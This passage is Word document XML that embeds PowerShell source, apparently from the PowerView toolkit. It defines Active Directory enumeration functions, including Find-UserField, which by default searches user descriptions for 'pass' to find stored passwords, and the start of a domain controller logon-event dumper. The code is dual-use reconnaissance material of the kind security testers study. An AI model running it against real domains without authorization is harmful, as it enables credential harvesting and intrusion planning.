        <w:t xml:space="preserve">        PS C:\&gt; Get-UserProperty -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218B7F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39569A48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all user properties for users in the 'testing' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69994B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="502AA39E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3C848" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DB72A80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-UserProperty -Properties ssn,lastlogon,location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6611E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F289609" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all an array of user/ssn/lastlogin/location combinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310C4D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for users in the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B4EFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0AF1D0DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5E141" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02FF854F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9E392" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C1089" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F6346F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA63A7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E8F33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71685D6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Properties,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD55738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="527FEEC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F78C81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5E64B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF06BEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568D158" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2133CE93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B889A51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295091E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B88C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A518B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34E71DE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21723F85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB91AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C109B2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="541DD474" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Properties) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C4E85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract out the set of all properties for each object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CF8C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Properties = ,"name" + $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B056BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -Property $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC5AD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5835BD33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8383A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract out just the property names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081D5B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -First 1 | Get-Member -MemberType *Property | Select-Object -Property 'Name'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0ED14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C3EE36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F964E35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="344310C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BE6C396" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Find-UserField {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA148E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652354DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B94DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B0A3E9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Searches user object fields for a given word (default *pass*). Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531121EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        field being searched is 'description'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F0B36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A6E0477" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Taken directly from @obscuresec's post:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE07A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74682A8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B34FC06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchTerm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB550D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38EA2536" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Term to search for, default of "pass".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A266CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="364EACAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03433966" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44FDBBA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        User field to search, default of "description".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55148E9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10B046E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CB6ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="782285F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7AA687" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5379A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="406F2275" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289C93C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AF9B765" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to search computer fields for, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD8B2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11D0A333" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11A64F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C25E2D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B35A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35C63DAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139195A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="568E3CB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BBA946" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F599AC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B938E8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76D06AEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2C650" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639EB829" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B0BF993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75725FD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FD349A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-UserField -SearchField info -SearchTerm backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCFBB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18113482" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find user accounts with "backup" in the "info" field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67182C53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256968D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57E796CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A915E76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1B7D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F56D7A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BD0A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchTerm = 'pass',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A045E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CA5667B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20598129" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchField = 'description',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCBAC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7755C5DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094DF98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A528D21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BFD0CB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCDD1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B49D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22ECD909" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EE185" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E8E73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="791B913D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319FCB98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A525890" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C7E0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="741CAE95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B627F9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6A30B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69C43F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A8A44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-NetUser -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB72353" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED31213" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32694476" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B742987" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-UserEvent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0269DE8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328AF3FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE9F3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06EF6A03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Dump and parse security events relating to an account logon (ID 4624)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C2A4D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or a TGT request event (ID 4768). Intended to be used and tested on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39DAD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Windows 2008 Domain Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C4530" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Admin Reqd? YES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5147244B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="314833A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @sixdub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F16DEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E12C6AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315CFA25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56F53DDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The computer to get events from. Default: Localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19538B73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="351982C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER EventType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB21DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C0E70F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
